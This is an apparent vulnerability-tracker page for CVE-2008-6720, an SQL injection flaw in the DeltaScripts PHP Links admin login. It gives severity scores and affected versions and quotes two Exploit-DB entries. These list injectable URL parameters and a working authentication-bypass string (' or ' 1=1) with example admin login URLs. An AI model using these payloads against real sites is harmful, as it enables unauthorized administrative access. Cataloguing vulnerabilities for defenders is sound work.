CVE-2008-6720
published 2009-04-13CVE-2008-6720: SQL injection vulnerability in admin/adm_login.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.6th percentile
SQL injection vulnerability in admin/adm_login.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the admin_username parameter (aka the admin field).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltascripts | php_links | <= 1.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DELTAScripts PHP Links - Multiple SQL Injections
exploitdb·2012-09-10
CVE-2008-6720 DELTAScripts PHP Links - Multiple SQL Injections
DELTAScripts PHP Links - Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.ph
Exploit-DB
DELTAScripts PHP Links 1.3 - Authentication Bypass
exploitdb·2008-11-06
CVE-2008-6720 DELTAScripts PHP Links 1.3 - Authentication Bypass
DELTAScripts PHP Links 1.3 - Authentication Bypass
---
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://localhost/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://localhost/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------
No writeups or analysis indexed.
2009-04-13
Published